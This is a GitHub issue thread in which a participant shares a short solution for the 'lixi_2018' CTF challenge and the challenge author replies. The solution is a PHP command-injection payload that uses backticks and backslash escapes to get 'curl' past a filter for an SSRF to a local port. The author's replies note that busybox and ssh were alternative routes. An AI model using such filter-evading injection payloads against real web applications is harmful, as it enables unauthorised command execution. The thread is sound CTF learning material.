### ISSUE TITLE
Add shortest solution of lixi_2018

### ISSUE THREAD

**Issue by WangYihang** [l4wio/CTF-challenges-by-me#2]
> 22 Bytes
```
?%E2%81%A3=${${`cu\\rl 0:88\88`}};
```
not for arbitrary command execution, ssrf to get flag~

**Comment by l4wio** [comment]
Cool! Actually, prior to releasing the challenge, I already removed `curl` `wget` `telnet` stuff.
But it turns out that `busybox` can be used.

**Comment by WangYihang** [comment]
oh, `${{}}` is useless
```
`cu\\rl 0:88\88`;
```

**Comment by WangYihang** [comment]
wow, I did not notice that... I just test it in my computer~ thank you for your excellent challenge, pretty cool~

**Comment by l4wio** [comment]
Glad you liked it! Enjoy other ones ~

**Comment by WangYihang** [comment]
Oh, I think there was a mistake.. I didn't noticed that the function `shell_exec` will not print the output of the command... so I was my fault, I think `die()` or any other functions can print string are necessary;

**Comment by l4wio** [comment]
Yea, you can check the solutions out, there is one payload which using ```die(`ssh...``` got the same idea to yours.
